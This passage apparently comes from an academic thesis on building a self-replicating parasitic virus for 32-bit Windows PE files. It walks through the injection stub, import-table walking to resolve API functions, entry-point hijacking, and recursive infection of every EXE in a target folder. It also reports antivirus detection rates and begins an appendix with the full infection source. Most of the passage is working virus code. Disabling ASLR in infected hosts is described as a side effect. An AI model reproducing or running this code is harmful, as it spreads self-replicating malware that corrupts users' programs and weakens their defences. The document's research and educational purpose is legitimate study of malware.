25 popad // Restore registerspush 0xCCCCCCCC // Push address of original entry point (placeholder)retn // retn used as jmp

szText:30 bb(’G’) bb(’r’) bb(’e’) bb(’e’) bb(’t’) bb(’i’) bb(’n’)

bb(’g’) bb(’s’) bb(’ ’) bb(’f’) bb(’r’) bb(’o’) bb(’m’)bb(’ ’) bb(’B’) bb(’e’) bb(’e’) bb(’r’) bb(’e’) bb(’n’)bb(’d’) bb(’ ’) bb(’&’) bb(’ ’) bb(’J’) bb(’a’) bb(’n’)bb(’w’) bb(’i’) bb(’l’) bb(’l’) bb(’e’) bb(’m’) bb(0)

35 szTitle:bb(’O’) bb(’S’) bb(’S’) bb(’E’) bb(’C’) bb(0)

}}void StubEnd(){}

The 0xCCCCCCCC addresses are placeholders that need to be replaced beforeinjecting the code. At this point, we are able to inject assembly code into the host,but our goal is to write our viral code in C++ and then inject it.

5.2 Compiler settings

Because we use inline functions and a lot of relative addressing, we need to ensurethat the code gets compiled exactly in the way that we intend it. This can be doneby configuring the compiler with the following options (Visual Studio):

• Optimization: Maximize Speed (/O2)This option forces the compiler to really inline the functions when we ask it.

• Enable Incremental Linking: No (/INCREMENTAL:NO)This ensures that the generated machine code is in the same order as thesource code.

• Release modeWhen building in debug mode, the added debug information will cause theinjected code to crash.

5.3. VIRAL CODE STRUCTURE 23

Parameters

Constants

Assembly stub

C Stub

ThreadStart

InfectDirVCodeEnd

AStubStart

CStubStart

ThreadStart

InfectDir

Figure 5.1: Structure of the injected code

5.3 Viral code structure

Figure 5.1 shows the structure of our injected code. We will briefly explain thedifferent parts here and elaborate on them in the next sections. The first block isa Parameter structure which contains information that will need to be updated foreach host. The second is also a structure but the information in this one remainsconstant for all hosts. The rest are functions:

• AStubStart is a small assembly stub, based on the code from section 5.1.However, instead of calling the MessageBox function, we call our own CStub-Start function.

• CStubStart is a C function that shows a MessageBox, starts ThreadStart in anew thread and returns.

• ThreadStart contains the code for a separate thread that will contain the pay-load. In our case, it just searches for new hosts which it will infect.

• InfectDir is a recursive function that is used by ThreadStart.

5.4 First generation

In this section, we will explain the injection of our code into the first host. The fullcode can be found in Appendix A. We will go over the most important parts here.

First, we calculate the sizes of the different components of our viral code. (Formore information, see figure 5.1.)

24 CHAPTER 5. IMPLEMENTATION

int main(int argc, char* argv[]) {...// Work out stub size.// Our viral code contains: parameters, constants, assembly stub, C stub

5 DWORD aStubSize = (DWORD)CStubStart - (DWORD)AStubStart;DWORD cStubSize = (DWORD)VCodeEnd - (DWORD)CStubStart;DWORD stubSize = (DWORD)VCodeEnd - (DWORD)AStubStart; // Not including

parameters or constantsDWORD totalSize = stubSize + sizeof(Parameters) + sizeof(Constants);

Next, we open the file we want to infect and use some functions of the WindowsAPI to map the PE file structure. We also check whether the file is already infected.(We put a signature in the DOS header to signal this.) If so, we won’t infect it asecond time.// Map file to infect.const char *fileName = target;hFile = CreateFile(fileName, GENERIC_WRITE | GENERIC_READ,

FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL, NULL);

...5 fsize = GetFileSize(hFile, 0);

...hFileMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize,

NULL);...

10 hMap = (LPBYTE)MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0,fsize);

...if (pDosHeader->e_res[0] == 0x424a) {

// File already infected.15 goto cleanup;

}pNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)hMap + pDosHeader->e_lfanew);...

We increase the file size by the size of our viral code, rounded up to be amultiple of the SectionAlignment in the PE header. If we don’t do this correctly,the file will be corrupt and no longer work. After doing this, we need to re-map PEstructure.// Work out extra size needed in exe, rounded up to a multiple of

alignment.DWORD alignment = pNtHeaders->OptionalHeader.SectionAlignment;DWORD alignedTotalSize = ((totalSize / alignment) + 1) * alignment;

5 // Reload file map and increase the fileSize by what we need to injectour code (respecting the SectionAlignment)

// First, clean up old map....// Increase file size.fsize += alignedTotalSize;

10 // Re-create map.hFileMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, fsize,

5.4. FIRST GENERATION 25

NULL);...hMap = (LPBYTE)MapViewOfFile(hFileMap, FILE_MAP_ALL_ACCESS, 0, 0,

15 fsize);...

We go to the header of the last section to increase the size fields and changethe characteristics of the section, so it can be executed. We also increase the Size-OfImage in the PE header. If not done correctly, the file will be corrupt.

// Get first and last section.pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)hMap + pDosHeader->

e_lfanew + sizeof(IMAGE_NT_HEADERS));pFirstSection = pSectionHeader;pLastSection = pFirstSection + (pNtHeaders->FileHeader.NumberOfSections

- 1);5

// Create a place for our viral thread and its parameters, by extendingthe last section.

pLastSection->Misc.VirtualSize += totalSize;pLastSection->SizeOfRawData += alignedTotalSize;pLastSection->Characteristics |= IMAGE_SCN_MEM_WRITE |

IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE;10 pNtHeaders->OptionalHeader.SizeOfImage = pLastSection->VirtualAddress +

pLastSection->Misc.VirtualSize;

We copy the assembly stub into a buffer so we can modify its code. We replacethe 0xCCCCCCCC placeholders with what will be the actual addresses in this targethost.

• oepOffset is the offset in the assembly stub of the placeholder for the addressof the original entry point (oep).

• parsOffset is the offset in the assembly stub of the placeholder for the addressof the parameters structure. Our CStubStart takes a pointer to this structureas an argument. Because we know all sizes and offsets, our code can find allrequired information relative to this address.

• saOffset is the offset in the assembly stub of the placeholder for the addressof CStubStart (i.e. the start address, hence ‘sa’).

// Save original entry point.oep = oepRva = pNtHeaders->OptionalHeader.AddressOfEntryPoint;oep += pSectionHeader->PointerToRawData -pSectionHeader->VirtualAddress;

5 // Copy stub into a buffer....// Locate offsets of placeholders in assembly stub....// Fill in placeholders.

26 CHAPTER 5. IMPLEMENTATION

10 *(u_long *)(aStub + oepOffset) = pNtHeaders->OptionalHeader.ImageBase +oepRva;

*(u_long *)(aStub + parsOffset) = pNtHeaders->OptionalHeader.ImageBase +pLastSection->VirtualAddress + pLastSection->Misc.VirtualSize -totalSize;

*(u_long *)(aStub + saOffset) = pNtHeaders->OptionalHeader.ImageBase +pLastSection->VirtualAddress + pLastSection->Misc.VirtualSize -totalSize + sizeof(Parameters) + sizeof(Constants) + aStubSize;

We create the constants structure for the first time and fill in all fields. TheSetLLAndGPA function (described in section 5.4.1) will fill in the parametersstructure.// Create constants and parameters.Constants consts;// Fill in sizes....

5 // Fill in offsets of placeholders....// Fill in strings....// Offsets of functions.

10 consts.offsetCStubStart = sizeof(Parameters) + sizeof(Constants) +aStubSize;

consts.offsetThreadStart = (DWORD)ThreadStart - (DWORD)CStubStart;consts.offsetInjectDir = (DWORD)injectDir - (DWORD)CStubStart;

Parameters pars;15 // Addresses/offsets of library functions.

// Fill in the ’base address’ and offsets to LoadLibraryA andGetProcAddress.

// This way, we can use those functions even if they are not originallyimported by the host program.

setLLAndGPA(&pars, hMap, pNtHeaders, pFirstSection);

Finally, we append our viral code to the target. We write it piece by piece:Parameters, Constants, assembly stub, C code. Note that we write the assemblystub from the buffer, where the placeholders have been replaced. We also make theAddressOfEntryPoint point to the start of our assembly stub and place our signaturein the DOS header.// Write our code to the last section.PBYTE startInjectedCode = (PBYTE)hMap + pLastSection->PointerToRawData +

pLastSection->Misc.VirtualSize - totalSize;memcpy(startInjectedCode, &pars, sizeof(Parameters));memcpy(startInjectedCode + sizeof(Parameters), &consts,

5 sizeof(Constants));memcpy(startInjectedCode + sizeof(Parameters) + sizeof(Constants),

aStub, aStubSize);memcpy(startInjectedCode + sizeof(Parameters) + sizeof(Constants) +

aStubSize, CStubStart, cStubSize);10 // Set new entrypoint.

pNtHeaders->OptionalHeader.AddressOfEntryPoint = pLastSection->VirtualAddress + pLastSection->Misc.VirtualSize - totalSize + sizeof(Parameters) + sizeof(Constants);

5.4. FIRST GENERATION 27

// Write our signaturepDosHeader->e_res[0] = (DWORD)0x424a;// Clean up.

15 ...}

5.4.1 setLLAndGPA

[1] replaced the MessageBox placeholder by an address obtained via GetProcAd-dress at the time of injction. This address however is not guaranteed to remainthe same if the computer should reboot. To solve this problem, we want to loadall required API functions dynamically at runtime. To do this, we need accessto LoadLibrary and GetProcAddress from Kernel32.dll, but not all programs willimport those. One solution would be to use LdrLoadDll and LdrGetProcedureAd-dress from ntdll.lib which can be linked at compile time[7]. Another solution is toperform “memory walking” in Kernel32.dll, using some known address as a baseand try to find the required functions relative to that base.

We chose the second solution: the setLLAndGPA function, used in the previoussection, will walk over the Import Address Table of the target host and look forthe first function that is imported from Kernel32.dll. It will store its name andRVA in the PE file. The value at this RVA will at runtime contain the addressof this function. We will determine the relative addresses of LoadLibrary andGetProcAddress with respect to this function. The found RVA and the two offsetswill be stored in the Parameters structure.

bool setLLAndGPA(Parameters *pars, LPBYTE hMap, IMAGE_NT_HEADERS *pNtHeaders, IMAGE_SECTION_HEADER *pFirstSection) {

// Load librariesHMODULE hUser32 = LoadLibrary("User32.dll");HMODULE hKernel32 = LoadLibrary("Kernel32.dll");

5 ...// Read importsPIMAGE_IMPORT_DESCRIPTOR pImports = (PIMAGE_IMPORT_DESCRIPTOR)((DWORD)hMap + Rva2Offset(

pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress,

10 pFirstSection, pNtHeaders->FileHeader.NumberOfSections));// Look at the import address table of the hostDWORD baseFuncRVA;char* baseFuncName;while (pImports->Name) {

15 char* s = (char*)((DWORD)hMap +Rva2Offset(pImports->Name, pFirstSection,

pNtHeaders->FileHeader.NumberOfSections));DWORD pImageThunk = pImports->OriginalFirstThunk ? pImports->

OriginalFirstThunk : pImports->FirstThunk;PIMAGE_THUNK_DATA itd = (PIMAGE_THUNK_DATA)(

20 (DWORD)hMap +

28 CHAPTER 5. IMPLEMENTATION

Rva2Offset(pImageThunk, pFirstSection,pNtHeaders->FileHeader.NumberOfSections));

pImageThunk = pImports->FirstThunk;25 while (itd->u1.AddressOfData) {

PIMAGE_IMPORT_BY_NAME name_import = (IMAGE_IMPORT_BY_NAME*)((DWORD)hMap +Rva2Offset((DWORD)itd->u1.AddressOfData, pFirstSection,

pNtHeaders->FileHeader.NumberOfSections));30 // Get a any (first) imported function from Kernel32.dll

if(!stricmp(s, "kernel32.dll")) {baseFuncRVA = pNtHeaders->OptionalHeader.ImageBase + pImageThunk;baseFuncName = (char*)name_import->Name;break;

35 }itd++;pImageThunk += sizeof(DWORD);

}pImports++;

40 }// Set parametersDWORD addressBaseFunc = (DWORD)GetProcAddress(hKernel32, baseFuncName);pars->baseFunctionRVAinIAT = baseFuncRVA;pars->walkOffsetLL = (DWORD)GetProcAddress(hKernel32, "LoadLibraryA") -

addressBaseFunc;45 pars->walkOffsetGPA = (DWORD)GetProcAddress(hKernel32, "GetProcAddress")

- addressBaseFunc;// Free libraries and return...

}

5.4.2 AStubStart

Our assembly stub will simply push the address of our Parameters on the stack andcall CStubStart. When this function returns, the assembly stub will return to theoriginal entry point, passing control to the original host program.

As explained in the previous sections, this function contains three placeholders.__declspec(naked) void AStubStart() {__asm{

pushad // Preserve all registers

5 push 0xCCCCCCCC // parameters: pointer to Parameters, passed toCStubStart

mov eax, 0xCCCCCCCC // sa: address at which CStubStart can be foundcall eax // Call CStubStart

popad // Restore registers10 push 0xCCCCCCCC // Push address of original entry point

retn // retn used as jmp}

}

5.4. FIRST GENERATION 29

5.4.3 CStubStart

This function receives a pointer to the parameter structure. Since the exact size ofthis structure is known, the function can use this information to also obtain pointersto the Constants structure and itself. From its own address and the offset stored inthe Constants, it can calculate the address of ThreadStart.

void CStubStart(Parameters *pars) {Constants *consts = (Constants*)((DWORD)pars + sizeof(Parameters));DWORD addrOfSelf = (DWORD)pars + consts->offsetCStubStart;DWORD addrOfThreadStart = addrOfSelf + consts->offsetThreadStart;

Now, we load LoadLibrary and GetProcAddress, with the information in theParameters. We use these functions to load the MessageBox function from User32.dlland CreateThread from Kernel32.dll. We show a messagebox with our greeting andstart our viral code in a new thread.

LoadLibraryFun loadLibraryF = (LoadLibraryFun)(

*(DWORD*)pars->baseFunctionRVAinIAT + pars->walkOffsetLL);GetProcAddressFun getProcAddressF = (GetProcAddressFun)(

*(DWORD*)pars->baseFunctionRVAinIAT + pars->walkOffsetGPA);5

HMODULE user32 = loadLibraryF(consts->user32dll);HMODULE kernel32 = loadLibraryF(consts->kernel32dll);MessageBoxFun msgBoxAF = (MessageBoxFun)getProcAddressF(user32,consts->messageboxa);

10 CreateThreadFun createThreadF = (CreateThreadFun)getProcAddressF(kernel32, consts->createthread);

msgBoxAF(NULL, consts->text, consts->caption, consts->buttons);

15 createThreadF(NULL, 0, (LPTHREAD_START_ROUTINE)addrOfThreadStart,pars, 0, NULL);

return;}

5.4.4 ThreadStart

In our thread, we create a structure that contains the addresses of the functions weneed. As before in CStubStart, we load all these addresses dynamically. Next, wecall infectDir. This is a recursive function which will go through a target directory(consts->targetPath, e.g. C:\Windows), infecting all EXE files it finds.

DWORD ThreadStart(LPVOID parsVoid) {Parameters *pars = (Parameters*)parsVoid;Constants *consts = (Constants*)((DWORD)pars + sizeof(Parameters));

5 LoadLibraryFun loadLibraryF = (LoadLibraryFun)(

*(DWORD*)pars->baseFunctionRVAinIAT + pars->walkOffsetLL);GetProcAddressFun getProcAddressF = (GetProcAddressFun)(

*(DWORD*)pars->baseFunctionRVAinIAT + pars->walkOffsetGPA);

30 CHAPTER 5. IMPLEMENTATION

10 HMODULE user32 = loadLibraryF(consts->user32dll);HMODULE kernel32 = loadLibraryF(consts->kernel32dll);

Functions f;f.MessageBox = (MessageBoxFun)getProcAddressF(user32,

15 consts->messageboxa);...f.FindFirstFile = (FindFirstFileFun)getProcAddressF(kernel32,

consts->findfirstfile);f.FindNextFile = (FindNextFileFun)getProcAddressF(kernel32,

20 consts->findnextfile);

DWORD addrOfCStub = (DWORD)pars + consts->offsetCStubStart;DWORD addrOfInfectDir = addrOfCStub + consts->offsetInfectDir;infectDirFun infectDirF = (infectDirFun)addrOfInfectDir;

25 infectDirF(consts->targetPath, addrOfInfectDir, pars, consts, &f);return 0;

}

5.5 Next generations

To make sure that infected programs can again infect others, the injection codeitself should also be injected. The infectDir function, described previously, willcall infectEXE. This is an inline function that is very similar to the main function ofthe first generation. The differences are that all calls to API functions are replacedby function pointers, all constant strings are looked up in the Constants and thecode can be copied in one piece from the infecting host to the new target.

5.6 Disinfection

Because the infection procedure is deterministic it can easily be reversed, resultingin the following disinfection procedure:

• find the original EntryPoint of the host in the viral code

• overwrite the viral code with zeros

• restore the size fields in the header of the last section

• restore the original EntryPoint in the OptionalHeader

• remove our signature from the DOS header

• restore the original file size

The code to do this is given in Appendix B.

5.7. SUMMARY 31

5.7 Summary

To summarize all the above, the injected C code should:

• Contain no explicit function calls: we store their names in the Constants andload them dynamically at runtime, and can then call them using functionpointers.

• Contain no constant strings: put those in the Constants.

• Use inline function expansion as much as possible.

• If inlining is not possible, find the relative offset of the function with respectto CStubStart and put this offset in the Constants (as we did for infectDir).

Note: compiler specific functions like memcpy, strcpy, malloc, free, etc. will notwork when they are injected so it is necessary to use a Windows API equivalent orwrite your own implementation.

Chapter 6

Tests and Results

During the development of our virus, we continuously tested if each addition stillworked. In this chapter we show the final result of our virus.

6.1 Viral replication

Figure 6.1a shows the original host application we chose to infect with our firstgeneration virus. It has a file size of 66kB.

(a) before infection (b) after infection

Figure 6.1: Filesize (a) before (b) after infection

After running our infection program, we can already see that the file size has

32

6.1. VIRAL REPLICATION 33

increased to 70kB (figure 6.1b). Furthermore we can analyze the PE structure andsee that our signature is now present in the DOS header (figure 6.2a).

(a) DOS header with our signature

(b) Last section, containing our constant strings

Figure 6.2: Infected file, containing (a) our signature and (b) our constant strings

If we take a look in the last section, we can see that our code is indeed injected.The Constants structure is very easy to find because it contains our constant strings(figure 6.2b).

When we run the infected application, a message box with our greeting appears(figure 6.3) to indicate that this file is indeed infected. When we click it away, theoriginal host program will start and on the background our infection thread willrun.

If we take a look at our infection target folder, we can already see that theinstance of PEview.exe now also has a filesize of 70kB (fig. 6.4). This file isnow infected with a second generation of our virus and it also has the capabilityto spread the virus. This is the case for every executable that was present in thisfolder and all subfolders so to show this we would need to put some uninfectedexecutables in the folder again. Next, we can execute one of the programs that

34 CHAPTER 6. TESTS AND RESULTS

Figure 6.3: Greeting of our virus

is infected with our second generation virus. The result will be that again everyEXE in the target folder will be infected. No files will get infected more than oncebecause our virus looks for our signature in the DOS header and will not infectfiles that already have this signature. This demonstrates the replication ability ofour virus.

Figure 6.4: Next generation virus

6.2. INFECTION CAPABILITY 35

6.2 Infection capability

We tested our virus on a 32 bit Windows 7 computer. 64 bit PE files have a similarstructure, but might not be handled correctly by our virus because of the largeraddress sizes in those files. We haven’t tested this.

Another type of exe files that can’t be infected by our virus are .NET executa-bles: they don’t import any functions from kernel32.dll so our virus will not be ableto find the addresses of the API functions it needs. We added some extra checks inour final injection code to ensure that these files remain untouched in order to notcorrupt them.

During our tests we noticed that some applications crashed after being infectedby our virus. By analyzing those files more closely we noticed that they make useof Address Space Layout Randomization (ASLR)[18]. The cmd.exe program inthe Windows/System32 folder is an example of such an application. We were ableto circumvent this process by simply putting the flag in the OptionalHeader thatenables this to zero. This seems to work fine at first sight, but it may also make thehost application vulnerable to memory based exploits like buffer overflow becausewe disabled the ASLR security feature.

6.3 Anti-virus

Although we didn’t care much about being stealthy, we were interested if our viruswould be detected by anti-virus software. The computer on which we tested ourvirus uses Lavasoft Ad-Aware and BitDefender. Installing more anti-virus pro-grams is hard because most of them complain if they are not the only one. Aftersome searching we found a website called VirusTotal (www.virustotal.com) whichis a subsidiary of Google. They allow you to upload a file and they run it throughseveral malware scanners. We infected 4 different programs with our virus andasked VirusTotal to scan them.

The result is that our virus gets detected by 7 out of 46, 4 out of 45, 7 out of46 and 5 out of 45 scanners. (We suspect that the number of scanners used variesdepending on the server load at that time.) This is on average a detection in 12.6%of the scanners. On the one hand it is normal that many scanners don’t detectour virus because it is unknown to them. The scanners need to rely on heuristics,as explained in section 2.2.2. On the other hand it is somewhat alarming thatthese heuristic scanners of so many anti-virus programs are so poor. It is howeverimportant to note that virus total uses the scan functionality of these programs.They may still be able to detect the suspicious behavior of our virus at runtime.

36 CHAPTER 6. TESTS AND RESULTS

Used scanners

The different scanners that were used by VirusTotal are listed below. The num-ber of stars behind each name indicates in how many of the provided samples thescanner detected our virus. Only one of them was able to consistently detect it!

1. Agnitum2. AhnLab-V33. AntiVir***4. Antiy-AVL5. Avast6. AVG7. BitDefender*8. ByteHero9. CAT-QuickHeal*

10. ClamAV11. Commtouch12. Comodo*13. DrWeb14. Emsisoft*15. eSafe16. ESET-NOD32***

17. F-Prot18. F-Secure*19. Fortinet20. GData*21. Ikarus22. Jiangmin23. K7AntiVirus24. Kaspersky*25. Kingsoft26. Malwarebytes27. McAfee**28. McAfee-GW-

Edition****29. Microsoft30. MicroWorld-eScan31. NANO-Antivirus

32. Norman33. nProtect34. Panda35. PCTools36. Rising37. Sophos38. SUPERAntiSpyware39. Symantec40. TheHacker41. TotalDefense42. TrendMicro*43. TrendMicro-

HouseCall*44. VBA3245. VIPRE**46. ViRobot

When we re-uploaded one of the samples one week later, we noticed that morescanners were able to detect our virus: the detection ratio for this sample went from4/45 to 13/46. This indicates that the virus scanners have learned about our virus.VirusTotal states that a submitted sample is freely sent to all vendors of scannersthat did not detect anything if at least one other did.

Chapter 7

Conclusion

In this paper, we explained and showed how a C++ program could be injected intoanother Portable Executable. We used this technique to write a self-replicating par-asitic virus, targeting 32 bit Windows computers. Since our virus is only intendedas an academic example, we confined the infection process to a single directoryand didn’t include any malicious payload. It is however not that hard to use theframework we provide for such purposes.

We thoroughly tested the resulting virus and examined its infection capabilityby infecting different host applications. We also looked at how stealthy our virus isby having it analyzed by multiple anti-virus programs, showing that they performquite bad against a new virus. We did no effort at all to hide our virus, but most ofthem failed to recognize it anyway.

Note that there is also a much easier method to inject your own code into an-other executable: the viral code can simply be written like a regular C program andbe compiled into a DLL. The injected code can then dynamically load this DLLand execute its exported functions[2]. This way, the total amount of injected codewill be much smaller and the viral code in the DLL doesn’t need to be writtenspecifically to be injected, i.e. using inline function expansion, relative addressing,Constants structure, etc. The disadvantage is that this is more conspicuous and canbe easily countered by just finding and removing the injected DLL.

37

Appendix A

Infection code

This is the full source code of our first generation infection program. This programopens a file and injects our entire viral code. After infection, when this program isexecuted it will show a messagebox and then run the original program. In a seperatethread, all EXE files in the target directory will also be infected. The names of thefirst file to be infected and the target directory are hardcoded as ”PEview.exe” and”C:\test” respectively, but this can easily be changed if required. Make sure thatthe compiler is configured as described in 5.2.

#include <Windows.h>#include <iostream>#include <strsafe.h>

5 #pragma region Type Declarations

struct Parameters; struct Constants; struct Functions;

// Function types.10 // Windows API functions.

typedef int (WINAPI *MessageBoxFun)(HWND, LPCSTR, LPCSTR, UINT);typedef HMODULE (WINAPI *LoadLibraryFun)(LPCSTR);typedef FARPROC (WINAPI *GetProcAddressFun)(HMODULE, LPCSTR);typedef HANDLE (WINAPI *CreateThreadFun)(LPSECURITY_ATTRIBUTES, SIZE_T,

LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);15 typedef HANDLE (WINAPI *CreateFileFun)(LPCSTR, DWORD, DWORD,

LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);typedef DWORD (WINAPI *GetFileSizeFun)(HANDLE, LPDWORD);typedef HANDLE (WINAPI *CreateFileMappingFun)(HANDLE,

LPSECURITY_ATTRIBUTES, DWORD, DWORD, DWORD, LPCSTR);typedef LPVOID (WINAPI *MapViewOfFileFun)(HANDLE, DWORD, DWORD, DWORD,

SIZE_T);typedef BOOL (WINAPI *FlushViewOfFileFun)(LPCVOID, SIZE_T);

20 typedef BOOL (WINAPI *UnmapViewOfFileFun)(LPCVOID);typedef DWORD (WINAPI *SetFilePointerFun)(HANDLE, LONG, PLONG, DWORD);typedef BOOL (WINAPI *SetEndOfFileFun)(HANDLE);typedef BOOL (WINAPI *CloseHandleFun)(HANDLE);

38

39

typedef BOOL (WINAPI *FreeLibraryFun)(HMODULE);25 typedef HANDLE (WINAPI *FindFirstFileFun)(LPCSTR, LPWIN32_FIND_DATA);

typedef BOOL (WINAPI *FindNextFileFun)(HANDLE, LPWIN32_FIND_DATA);// Our own functions.typedef DWORD (*ThreadStartFun)(LPVOID);typedef void (*infectDirFun)(LPCSTR, DWORD, Parameters*, Constants*,

Functions*);30

#define STR_MAX_LENGTH 512

// Parameters included in viral code.struct Parameters {

35 // Offsets of library functions.// Relative Virtual Address of ’base function’ in Import Address Table.// At this location, we will find a pointer to the base function.DWORD baseFunctionRVAinIAT;// Offsets of library functions to base function.

40 DWORD walkOffsetLL, walkOffsetGPA;DWORD baseFunctionRVAinIAT2;// Offsets of library functions to base function.DWORD walkOffsetLL2, walkOffsetGPA2;

};45

// Constants included in viral code.struct Constants {

// Sizes.DWORD aStubSize, cStubSize, stubSize, totalSize;

50

// Offsets of placeholders in assembly stub.DWORD parsOffset, saOffset, oepOffset;

// Offsets of our own functions.55 // Offset between CStubStart and parameters.

// = sizeof(Parameters) + size of AStub.DWORD offsetCStubStart;// Offset between CStubStart and ThreadStart.// = address of ThreadStart - address of CStubStart.

60 DWORD offsetThreadStart;DWORD offsetInfectDir;

// Strings.char user32dll[50];

65 char kernel32dll[50];char createthread[50];char createfilea[50];char getfilesize[50];char createfilemappinga[50];

70 char mapviewoffile[50];char copymemory[50];char flushviewoffile[50];char unmapviewoffile[50];char setfilepointer[50];

75 char setendoffile[50];char closehandle[50];char loadlibrarya[50];char getprocaddress[50];

40 APPENDIX A. INFECTION CODE

char freelibrary[50];80 char messageboxa[50];

char findfirstfile[50];char findnextfile[50];char text[50];char caption[50];

85 int buttons;char targetPath[50];

};

// Functions used in the injection code.90 struct Functions {

CreateThreadFun CreateThread;CreateFileFun CreateFile;GetFileSizeFun GetFileSize;CreateFileMappingFun CreateFileMapping;

95 MapViewOfFileFun MapViewOfFile;FlushViewOfFileFun FlushViewOfFile;UnmapViewOfFileFun UnmapViewOfFile;SetFilePointerFun SetFilePointer;SetEndOfFileFun SetEndOfFile;

100 CloseHandleFun CloseHandle;LoadLibraryFun LoadLibrary;GetProcAddressFun GetProcAddress;FreeLibraryFun FreeLibrary;MessageBoxFun MessageBox;

105 FindFirstFileFun FindFirstFile;FindNextFileFun FindNextFile;

};

#pragma endregion110

#pragma region Helper Functions

// Helper functions.115 // These are FORCEINLINE, which means we don’t have to copy them

separately, as they will be inlined.

// Source: http://www.danielvik.com/2010/02/fast-memcpy-in-c.htmlFORCEINLINE void* MemoryCopy(void *dest, const void *src, size_t count) {char *dst8 = (char*)dest;

120 char *src8 = (char*)src;

while (count--) {

*dst8++ = *src8++;}

125

return dest;}

// String methods130 FORCEINLINE int OurStringLength(const char *s){

int res = 0;char *sc = (char*)s;while(*sc != 0){

41

sc++;135 res++;

}return res;

}

140 FORCEINLINE void StrCopy(char *dest, const char *source){//MemoryCopy(dest,source,OurStringLength(source)+1);char *d = dest;const char *s = source;

145 while(*s != 0){

*d++ = *s++;}

*d = 0;}

150

FORCEINLINE void StrConcat(char *dest, const char *source){int L = OurStringLength(dest);char *d = dest;const char *s = source;

155 d += L;while(*s != 0){

*d = *s;d++; s++;

}160 *d = 0;

}

FORCEINLINE void StringToLower(char *s) {165 for (; *s; s++) {

if (*s >= ’A’ && *s <= ’Z’) {

*s = *s - (’A’ - ’a’);}

}170 }

FORCEINLINE bool StringEqualI(const char *s1, const char *s2) {char *s1_ = (char*)s1;char *s2_ = (char*)s2;

175 StringToLower(s1_);StringToLower(s2_);while (*s1_ == *s2_) {if (*s1_ == ’\0’ || *s2_ == ’\0’)

return true;180

s1_++; s2_++;}

return false;185 }

// Returns true iff str ends with suffix.// Source: http://stackoverflow.com/a/7718223FORCEINLINE int endsWith(const char *str, const char *suffix) {

42 APPENDIX A. INFECTION CODE

190 if(str == NULL || suffix == NULL)return 0;

size_t strLen = OurStringLength(str);size_t suffixLen = OurStringLength(suffix);

195

if(suffixLen > strLen)return 0;

return StringEqualI(str + strLen - suffixLen, suffix);200 }

// Convert (absolute) address in file to virtual address.FORCEINLINE DWORD FileToVA(DWORD dwFileAddr, PIMAGE_NT_HEADERS pNtHeaders)

{PIMAGE_SECTION_HEADER lpSecHdr = (PIMAGE_SECTION_HEADER)((DWORD)

pNtHeaders + sizeof(IMAGE_NT_HEADERS));205 for(WORD wSections = 0; wSections < pNtHeaders->FileHeader.

NumberOfSections; wSections++) {if(dwFileAddr >= lpSecHdr->PointerToRawData) {if(dwFileAddr < (lpSecHdr->PointerToRawData + lpSecHdr->

SizeOfRawData)) {dwFileAddr -= lpSecHdr->PointerToRawData;dwFileAddr += (pNtHeaders->OptionalHeader.ImageBase + lpSecHdr->

VirtualAddress);210 return dwFileAddr;

}}

lpSecHdr++;215 }

return NULL;}

220 // Convert Relative Virtual Adress to offset within section.FORCEINLINE DWORD Rva2Offset(DWORD dwRva, PIMAGE_SECTION_HEADER

dwSectionRva, USHORT uNumberOfSections) {for (USHORT i=0; i<uNumberOfSections; i++) {

if (dwRva >= dwSectionRva->VirtualAddress)if (dwRva < dwSectionRva->VirtualAddress + dwSectionRva->Misc.

VirtualSize)225 return (DWORD)(dwRva - dwSectionRva->VirtualAddress + dwSectionRva

->PointerToRawData) ;dwSectionRva++;

}return (DWORD)-1;

}230

// In pars, set baseFunctionRVAinIAT, walkOffsetLL and walkOffsetGPA.FORCEINLINE bool setLLAndGPA(Parameters *pars, Constants *consts, LPBYTE

hMap, IMAGE_NT_HEADERS *pNtHeaders, IMAGE_SECTION_HEADER *pFirstSection) {

// Load libraries.HMODULE hUser32 = LoadLibrary("User32.dll");

235 HMODULE hKernel32 = LoadLibrary("Kernel32.dll");

43

if(!hUser32 || !hKernel32) {printf("[-] Could not load User32.dll or Kernel32.dll");return false;

}240

// Read imports.PIMAGE_IMPORT_DESCRIPTOR pImports = (PIMAGE_IMPORT_DESCRIPTOR)((DWORD)

hMap + Rva2Offset(pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress, pFirstSection,pNtHeaders->FileHeader.NumberOfSections));

// Look at the import address table of the host.245 DWORD baseFuncRVA;

char* baseFuncName = NULL;while(pImports->Name) {char* s = (char*)((DWORD)hMap + Rva2Offset(pImports->Name,

pFirstSection, pNtHeaders->FileHeader.NumberOfSections));printf("DLL: %s\n",s);

250 DWORD pImageThunk = pImports->OriginalFirstThunk ? pImports->OriginalFirstThunk : pImports->FirstThunk;

PIMAGE_THUNK_DATA itd = (PIMAGE_THUNK_DATA)((DWORD)hMap + Rva2Offset(pImageThunk, pFirstSection, pNtHeaders->FileHeader.NumberOfSections));

pImageThunk = pImports->FirstThunk;while(itd->u1.AddressOfData) {

255 PIMAGE_IMPORT_BY_NAME name_import = (IMAGE_IMPORT_BY_NAME*)((DWORD)hMap + Rva2Offset((DWORD)itd->u1.AddressOfData, pFirstSection,pNtHeaders->FileHeader.NumberOfSections));

// Get a any (first) imported function from kernel32.dllif(!stricmp( s, "kernel32.dll")) {

baseFuncRVA = pNtHeaders->OptionalHeader.ImageBase + pImageThunk;baseFuncName = (char*)name_import->Name;

260 break;}itd++;pImageThunk += sizeof(DWORD);

}265 pImports++;

}if(baseFuncName != NULL) // if we didn’t find an import from kernel32.

dll (e.g. for .NET executables), don’t infect the fileprintf("Using %s’s function address to find LoadLibraryA and

GetProcAddress\n", baseFuncName);else

270 return false;

// Set parameters.DWORD addressBaseFunc = (DWORD)GetProcAddress(hKernel32, baseFuncName);pars->baseFunctionRVAinIAT = baseFuncRVA;

